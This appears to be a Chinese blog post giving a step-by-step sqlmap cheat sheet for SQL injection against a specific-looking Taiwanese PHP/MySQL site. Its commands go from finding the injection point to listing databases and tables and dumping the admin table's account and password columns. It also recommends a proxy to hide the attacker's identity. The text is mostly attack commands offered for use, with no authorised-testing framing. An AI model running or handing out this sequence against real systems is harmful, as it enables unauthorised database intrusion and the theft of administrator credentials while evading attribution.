sqlmap是一個(gè)灰常強(qiáng)大的sql注入檢測(cè)與輔助工具，但是由于沒有圖形界面，基本上用起來比較麻煩，導(dǎo)致很多人可能寧愿用havij或者是pangolin也不愿意麻煩去翻幫助界面，我自己也是把很多語句貼到了一個(gè)記事本里面用，其實(shí)真正用起來也就5,6句，也不會(huì)太復(fù)雜，下文以php+mysql為例：

檢查注入點(diǎn)sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

列數(shù)據(jù)庫信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

指定庫名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

指定庫名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

指定庫名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

有幾個(gè)參數(shù)可能會(huì)用到，直接加在***面就可以了，更多詳細(xì)參數(shù)見官方文檔：

--cookie=COOKIE 在需要登錄的地方，需要登錄后的cookie

--proxy="http://127.0.0.1:8087" 使用HTTP代理隱藏自己的身份，比如使用goagent等

--sql-query=QUERY 執(zhí)行一個(gè)sql語句，不一定支持

過程的幾張圖如下：